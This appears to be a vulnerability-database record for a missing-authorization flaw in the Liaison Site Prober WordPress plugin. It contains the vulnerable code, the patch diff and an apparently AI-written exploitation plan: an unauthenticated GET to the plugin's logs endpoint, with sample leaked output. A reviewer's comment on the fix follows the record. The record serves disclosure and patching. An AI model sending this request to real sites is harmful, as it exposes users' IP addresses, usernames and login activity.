[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$foJ1-TkXCOVwmlEQI-c9rSS1AXSfJxUey2EDJ-PU2gSI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-3569","liaison-site-prober-missing-authorization-to-unauthenticated-information-exposure-in-logs-rest-api-endpoint","Liaison Site Prober \u003C= 1.2.1 - Missing Authorization to Unauthenticated Information Exposure in '\u002Flogs' REST API Endpoint","The Liaison Site Prober plugin for WordPress is vulnerable to Information Exposure in all versions up to and including 1.2.1 via the \u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs REST API endpoint. The permissions_read() permission callback unconditionally returns true (via __return_true()) instead of checking for appropriate capabilities. 
This makes it possible for unauthenticated attackers to retrieve sensitive audit log data including IP addresses, user IDs, usernames, login\u002Flogout events, failed login attempts, and detailed activity descriptions.","liaison-site-prober",null,"\u003C=1.2.1","1.2.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Missing Authorization","2026-04-23 19:17:51","2026-04-24 07:45:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Feda5addb-40e2-4187-b803-34500b36be0a?source=api-prod",1,[22,23,24,25],"README.txt","includes\u002Fclass-liaison-rest-controller.php","includes\u002Fclass-liaison-site-prober-list-table.php","liaison-site-prober.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3569 (Liaison Site Prober)\n\n## 1. Vulnerability Summary\nThe **Liaison Site Prober** plugin for WordPress (versions \u003C= 1.2.1) contains a missing authorization vulnerability within its REST API implementation. The endpoint `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs` is intended to provide audit logs to administrative users. However, the `permissions_read()` method in `LIAISIPR_REST_Controller` explicitly returns `true` via the WordPress core function `__return_true()`, bypassing any capability or authentication checks. This allows unauthenticated attackers to view sensitive site activity logs, including user IDs, IP addresses, and detailed action descriptions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs`\n- **Method:** `GET` (as defined by `WP_REST_Server::READABLE`)\n- **Authentication:** None required (Unauthenticated).\n- **Parameters:**\n  - `plugin` (string, optional): Defined in routes but ignored by the current `get_logs` implementation.\n  - `limit` (integer, optional): Defined in routes but ignored by the current `get_logs` implementation.\n- **Preconditions:** The plugin must be active. 
Logs must exist in the custom database table (usually populated automatically upon plugin activation and standard site usage).\n\n## 3. Code Flow\n1. **Route Registration:** In `includes\u002Fclass-liaison-rest-controller.php`, the `register_routes()` method defines the `\u002Flogs` route under the `site-prober\u002Fv1` namespace.\n2. **Permission Callback:** The route is configured with `'permission_callback' => [ $this, 'permissions_read' ]`.\n3. **The Vulnerable Sink:** The `permissions_read()` method is implemented as follows:\n   ```php\n   public function permissions_read() {\n       return __return_true(); \u002F\u002F This allows anyone to access the callback\n       \u002F\u002Freturn current_user_can( 'read' );\n   }\n   ```\n4. **Data Retrieval:** Upon a successful permission check (which is always true), the `get_logs()` method is called:\n   - It accesses the global `$wpdb` and the custom table `$wpdb->wpsp_activity`.\n   - It executes a `SELECT` query for `id, created_at, user_id, ip, action, object_type, description`.\n   - It returns the results as a JSON response.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a WordPress nonce. \n- WordPress REST API `GET` requests generally do not require a `_wpnonce` header if the `permission_callback` does not check for user capabilities or the `wp_rest` nonce specifically.\n- Since `permissions_read` returns `true` unconditionally, the request will be processed regardless of the presence or validity of a nonce.\n\n## 5. 
Exploitation Strategy\nThe goal is to retrieve the activity logs without any credentials.\n\n**Step 1: Discover the REST API Prefix**\nDetermine the REST API base URL (usually `\u002Fwp-json\u002F`).\n\n**Step 2: Execute the Exploit Request**\nUse the `http_request` tool to send a `GET` request to the vulnerable endpoint.\n\n- **Request URL:** `http:\u002F\u002F\u003Ctarget-ip>:\u003Cport>\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs`\n- **Method:** `GET`\n- **Headers:** \n  - `Accept: application\u002Fjson`\n\n**Step 3: Analyze Response**\nThe expected response is a JSON object containing a `logs` array.\n\n## 6. Test Data Setup\nTo ensure the exploit returns meaningful data, the target environment should have recorded some activity:\n1. **Install and Activate Plugin:** Use `wp-cli` to install version 1.2.1.\n2. **Generate Logs:**\n   - Log in and out of the WordPress admin.\n   - Create a dummy post: `wp post create --post_title=\"Audit Target\" --post_status=publish`.\n   - Update a post: `wp post update 1 --post_content=\"Modified content\"`.\n   - These actions populate the `wpsp_activity` table.\n3. **Verify Table Content (Internal):** `wp db query \"SELECT * FROM wp_wpsp_activity\"` (to confirm logs exist before testing external exposure).\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a body similar to:\n```json\n{\n  \"count\": 3,\n  \"logs\": [\n    {\n      \"id\": \"3\",\n      \"created_at\": \"2023-10-27 10:00:00\",\n      \"user_id\": \"1\",\n      \"ip\": \"192.168.1.100\",\n      \"action\": \"updated\",\n      \"object_type\": \"post\",\n      \"description\": \"Post updated: Audit Target\"\n    },\n    {\n      \"id\": \"2\",\n      \"created_at\": \"2023-10-27 09:55:00\",\n      \"user_id\": \"1\",\n      \"ip\": \"192.168.1.100\",\n      \"action\": \"login\",\n      \"object_type\": \"user\",\n      \"description\": \"User logged in: admin\"\n    }\n  ]\n}\n```\n\n## 8. Verification Steps\n1. 
**Compare JSON Output with Database:** Use `wp-cli` to check the content of the `wpsp_activity` table and verify it matches the JSON returned by the REST API.\n   ```bash\n   wp db query \"SELECT * FROM wp_wpsp_activity\" --list\n   ```\n2. **Confirm Unauthenticated Access:** Verify the `http_request` was made without any `Cookie` or `Authorization` headers.\n\n## 9. Alternative Approaches\nIf the standard `\u002Fwp-json\u002F` prefix is changed by a security plugin, attempt to find the REST API endpoint using the `Link` header from the homepage:\n1. `GET \u002F`\n2. Look for `Link: \u003Chttp:\u002F\u002Ftarget\u002Fwp-json\u002F>; rel=\"https:\u002F\u002Fapi.w.org\u002F\"`.\n\nIf the endpoint returns an empty list, ensure the `wpsp_activity` table is correctly defined. The table name is stored in `$wpdb->wpsp_activity`. Check its name using:\n```bash\nwp eval \"global \\$wpdb; echo \\$wpdb->wpsp_activity;\"\n```\nIf the table is empty, trigger more actions (e.g., failed login attempts) to populate it.","The Liaison Site Prober plugin for WordPress is vulnerable to unauthenticated information exposure via its REST API. 
The `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs` endpoint lacks proper authorization because its permission callback is set to unconditionally return true, allowing anyone to view sensitive audit logs including user IDs, IP addresses, and site activity details.","\u002F\u002F includes\u002Fclass-liaison-rest-controller.php line 49\npublic function permissions_read() {\n    return __return_true();\n    \u002F\u002Freturn current_user_can( 'read' );\n}\n\n---\n\n\u002F\u002F includes\u002Fclass-liaison-rest-controller.php line 11\npublic function register_routes() {\n\n    register_rest_route(\n        self::NAMESPACE,\n        '\u002Flogs',\n        [\n            [\n                'methods'             => WP_REST_Server::READABLE,\n                'callback'            => [ $this, 'get_logs' ],\n                'permission_callback' => [ $this, 'permissions_read' ],\n                \u002F\u002F ...","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fliaison-site-prober\u002F1.2.0\u002Fincludes\u002Fclass-liaison-rest-controller.php\t2026-01-30 08:10:58.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fliaison-site-prober\u002F1.2.2\u002Fincludes\u002Fclass-liaison-rest-controller.php\t2026-03-12 09:58:30.000000000 +0000\n@@ -47,8 +47,7 @@\n      * ----------------------------------------------------------------- *\u002F\n \n     public function permissions_read() {\n-        return __return_true();\n-        \u002F\u002Freturn current_user_can( 'read' );\n+        return current_user_can( 'manage_options' );\n     }\n \n     public function permissions_write() {","The exploit is a simple unauthenticated GET request to the plugin's REST API endpoint. \n\n1. Target Endpoint: \u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs\n2. Method: GET\n3. Authentication: None required. 
The plugin's permissions_read() function returns __return_true(), which bypasses WordPress's standard REST API capability checks.\n4. Payload: No specific payload or nonce is required. A standard HTTP GET request to the endpoint will return a JSON object containing the 'logs' array from the custom `wpsp_activity` database table, exposing IP addresses, user IDs, and activity descriptions.","gemini-3-flash-preview","2026-04-27 13:31:59","2026-04-27 13:32:39",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags\u002F1.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fliaison-site-prober.1.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags\u002F1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fliaison-site-prober.1.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags"]
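Review bot: in `permissions_read()` (the `@@ -47,8 +47,7 @@` hunk of `includes/class-liaison-rest-controller.php`), the new `return current_user_can( 'manage_options' );` carries no comment or docblock stating that the logs route is restricted to administrators. The removed lines show how the check was lost: a `__return_true()` bypass sat directly above a commented-out `current_user_can( 'read' )`. Suggest adding a short docblock that names the required capability, plus a regression test asserting that a request without credentials to the route is rejected, so a leftover debug bypass cannot ship again unnoticed. The trailing context shows `permissions_write()` with its body outside the diff; confirm in the same review that it does not follow the same pattern.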